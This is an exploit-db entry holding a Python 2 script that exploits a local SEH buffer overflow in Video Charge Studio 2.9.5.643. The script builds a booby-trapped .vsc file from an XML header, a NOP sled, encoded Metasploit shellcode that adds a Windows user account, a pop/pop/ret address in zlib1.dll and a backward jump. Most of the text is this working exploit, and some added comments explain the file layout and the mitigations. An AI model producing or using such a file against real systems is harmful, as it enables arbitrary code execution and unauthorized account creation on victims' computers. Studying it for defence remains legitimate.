Video Charge Studio 2.9.5.643 – ‘.vsc’ Local Buffer Overflow (SEH)

  • 作者: xsploited security
    日期: 2010-12-06
  • 来源:https://www.exploit-db.com/exploits/15692/
  • #!/usr/bin/python
    # Exploit Title: Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
    # Date: 12/05/2010
    # Author: xsploitedsec
    # URL: http://www.x-sploited.com/
    # Contact: xsploitedsecurity [at] x-sploited.com
    # Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
    # Version: <= 2.9.5.643 (Latest)
    # Tested on: Windows XP SP3 (Physical machine)
    # CVE: N/A
    
    ### Software Description: ###
    # Videocharge Studio is a video editing software which is intended for those users who
    # regularly work with video, create Internet video galleries, convert video files.
    # Videocharge Studio includes all features for video editing: video converting, splitting
    # video into parts, joining several video files into a single one, adding watermark on
    # video or image (add logo to video or photo), embedding image into video file, creating
    # video from several images, editing audio. Videocharge Studio can edit video without
    # reencoding as well.
    
    ### Exploit information: ###
    # Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc file's
    # "Filename" value field.
    # An attacker could trick a user into loading a specially crafted vsc file to execute
    # arbitrary code on the user's PC without their consent.
    
    ### Shouts: ###
    # kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
    # Have fun!
    
    # "When you know that you're capable of dealing with whatever comes, you have the only
    # security the world has to offer."					-Harry Browne
    
    import struct
    import sys
    
    # Start-up banner. The last line is a Python 2 `print` statement, so this
    # script is Python 2 only (a Python 3 interpreter rejects it at compile time).
    about = "=================================================\n"
    about +=" Video Charge Studio <= 2.9.5.643 (.vsc) BoF (SEH)\n"
    about +=" Author: xsploited security\n URL: http://www.x-sploited.com/\n"
    about +=" Contact: xsploitedsecurity [at] gmail.com\n"
    about +="=================================================\n"
    print about
    
    # msfpayload windows/adduser user=xsploited pass=secEXITFUNC=seh
    # R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b '\x00\x09\x0a
    # \x0d\x3e\x3c\x26\x20\x21\x22\x23\x2a\x07' > /tmp/encoded.txt
    # [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)
    
    # Encoder output from the msfencode run logged in the comment above: 22 string
    # fragments totalling 302 bytes, which matches the "size 302" line. The bytes are
    # opaque to this script; they are only concatenated into the attribute value.
    # The excluded-byte list above (NUL, TAB, LF, CR, space, BEL and the characters
    # < > & " ! # *) is consistent with the file being read as XML text before the
    # overflow is reached — the surrounding `header`/`footer` literals decode to an
    # XML document. Defensive note: a .vsc whose attribute value consists of several
    # hundred 0x90 bytes followed by non-printable data is trivially distinguishable
    # from a legitimate configuration file by a content scan.
    shellcode = (
    "\x6a\x46\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    "\xcf\xb0\x91\x83\xeb\xfc\xe2\xf4\x32\x27\x39\x91\xce\xcf"
    "\xd0\x18\x2b\xfe\x62\xf5\x45\x9d\x80\x1a\x9c\xc3\x3b\xc3"
    "\xda\x44\xc2\xb9\xc1\x78\xfa\xb7\xff\x30\x81\x51\x62\xf3"
    "\xd1\xed\xcc\xe3\x90\x50\x01\xc2\xb1\x56\x2c\x3f\xe2\xc6"
    "\x45\x9d\xa0\x1a\x8c\xf3\xb1\x41\x45\x8f\xc8\x14\x0e\xbb"
    "\xfa\x90\x1e\x9f\x3b\xd9\xd6\x44\xe8\xb1\xcf\x1c\x53\xad"
    "\x87\x44\x84\x1a\xcf\x19\x81\x6e\xff\x0f\x1c\x50\x01\xc2"
    "\xb1\x56\xf6\x2f\xc5\x65\xcd\xb2\x48\xaa\xb3\xeb\xc5\x73"
    "\x96\x44\xe8\xb5\xcf\x1c\xd6\x1a\xc2\x84\x3b\xc9\xd2\xce"
    "\x63\x1a\xca\x44\xb1\x41\x47\x8b\x94\xb5\x95\x94\xd1\xc8"
    "\x94\x9e\x4f\x71\x96\x90\xea\x1a\xdc\x24\x36\xcc\xa4\xce"
    "\x3d\x14\x77\xcf\xb0\x91\x9e\xa7\x81\x1a\xa1\x48\x4f\x44"
    "\x75\x31\xbe\xa3\x24\xa7\x16\x04\x73\x52\x4f\x44\xf2\xc9"
    "\xcc\x9b\x4e\x34\x50\xe4\xcb\x74\xf7\x82\xbc\xa0\xda\x91"
    "\x9d\x30\x65\xf2\xa3\xab\x9e\xf4\xb6\xaa\x90\xbe\xad\xef"
    "\xde\xf4\xba\xef\xc5\xe2\xab\xbd\x90\xe9\xbd\xbf\xdc\xfe"
    "\xa7\xbb\xd5\xf5\xee\xbc\xd5\xf2\xee\xe0\xf1\xd5\x8a\xef"
    "\x96\xb7\xee\xa1\xd5\xe5\xee\xa3\xdf\xf2\xaf\xa3\xd7\xe3"
    "\xa1\xba\xc0\xb1\x8f\xab\xdd\xf8\xa0\xa6\xc3\xe5\xbc\xae"
    "\xc4\xfe\xbc\xbc\x90\xe9\xbd\xbf\xdc\xfe\xa7\xbb\xd5\xf5"
    "\xee\xe0\xf1\xd5\x8a\xcf\xba\x91"
    );
    
    # Opening part of a .vsc document, hex-escaped. The bytes decode to
    #   <?xml version="1.0" encoding="Windows-1252" ?><config ver="2.9.5.643">
    #   <cols name="Files"/> <cols name="Profiles"> <Property name="Profile">
    #   <cols name="Formats"> <Property name="Format"> <Value name="Name" type="8" value="
    # (elements separated by CRLF). It stops inside the opening quote of the `value`
    # attribute, which is where the oversized payload is inserted.
    # NOTE(review): the element overflowed here is <Value name="Name">, while the
    # description at the top of the file calls the field "Filename"; the two may be
    # the same field under different names — confirm against the application's own
    # format before using either name in a detection signature.
    header = (
    "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30"
    "\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69\x6e\x64\x6f\x77\x73\x2d"
    "\x31\x32\x35\x32\x22\x20\x3f\x3e\x3c\x63\x6f\x6e\x66\x69\x67\x20\x76\x65\x72\x3d"
    "\x22\x32\x2e\x39\x2e\x35\x2e\x36\x34\x33\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20"
    "\x6e\x61\x6d\x65\x3d\x22\x46\x69\x6c\x65\x73\x22\x2f\x3e\x0d\x0a\x3c\x63\x6f\x6c"
    "\x73\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66\x69\x6c\x65\x73\x22\x3e\x0d\x0a"
    "\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20\x6e\x61\x6d\x65\x3d\x22\x50\x72\x6f\x66"
    "\x69\x6c\x65\x22\x3e\x0d\x0a\x3c\x63\x6f\x6c\x73\x20\x6e\x61\x6d\x65\x3d\x22\x46"
    "\x6f\x72\x6d\x61\x74\x73\x22\x3e\x0d\x0a\x3c\x50\x72\x6f\x70\x65\x72\x74\x79\x20"
    "\x6e\x61\x6d\x65\x3d\x22\x46\x6f\x72\x6d\x61\x74\x22\x3e\x0d\x0a\x3c\x56\x61\x6c"
    "\x75\x65\x20\x6e\x61\x6d\x65\x3d\x22\x4e\x61\x6d\x65\x22\x20\x74\x79\x70\x65\x3d"
    "\x22\x38\x22\x20\x76\x61\x6c\x75\x65\x3d\x22"
    );
    
    # Closing part of the document, hex-escaped. The bytes decode to
    #   "/> </Property> </cols> </Property> </cols> </config>
    # (CRLF-separated): the closing quote of the `value` attribute and the end tags
    # for every element opened in `header`, presumably so the result still parses as
    # a complete XML file.
    footer = (
    "\x22\x2f\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d\x0a"
    "\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x50\x72\x6f\x70\x65\x72\x74\x79\x3e\x0d"
    "\x0a\x3c\x2f\x63\x6f\x6c\x73\x3e\x0d\x0a\x3c\x2f\x63\x6f\x6e\x66\x69\x67\x3e"
    );
    
    # Layout of the overflowing attribute value, as recorded by the author:
    #   [0x90 padding][shellcode]  = exactly `size` (824) bytes, up to the SEH record
    #   EB 06 90 90                = next-SEH slot: short jump over the handler slot
    #   0x61B8451C (little-endian) = handler slot: pop/pop/ret in zlib1.dll
    #   E9 E0 FC FF FF             = near jump, displacement -0x320 = -800 bytes,
    #                                back into the padding
    # The chain depends on that handler address being a fixed, unprotected address
    # (the author calls it "universal"); SafeSEH, SEHOP and ASLR each break one of
    # those assumptions, which is why they are the standard mitigations for this
    # bug class rather than anything specific to this application.
    size = 824; #824 junk bytes triggers the bof
    
    payload = "\x90" * (size - len(shellcode));
    payload += shellcode
    
    payload += "\xEB\x06\x90\x90"; #jmp short
    payload += struct.pack("<L",0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
    payload += "\xe9\xe0\xfc\xff\xff"; #jmp back 800 bytes
    
    # Final file body: XML prefix, the oversized attribute value, XML suffix.
    xsploit = header + payload+ footer;
    
    # Both lines below are Python 2 `print` statements (the parentheses on the first
    # merely group a single string). The reported size is `size` + 13: 4 bytes
    # next-SEH, 4 bytes handler, 5 bytes backward jump.
    print("[*] Creating .vsc file");
    print "[*] Payload size = " + str(len(payload)) + " bytes";
    
    # Write the result to evil.vsc in the current working directory.
    # Style notes, left as written: the bare `except:` also catches
    # KeyboardInterrupt and SystemExit and discards the actual exception, so a
    # permissions problem and a typo report identically; a `with open(...)` block
    # would close the handle on the error path as well as the success path.
    try:
    	out_file = open("evil.vsc",'w');
    	out_file.write(xsploit);
    	out_file.close();
    	print("[*] Malicious vsc file created successfully");
    	print("[*] Launch Video Charge Studio and load the file\n[*] Exiting...\r\n");
    except:
    	print "[!] Error creating file";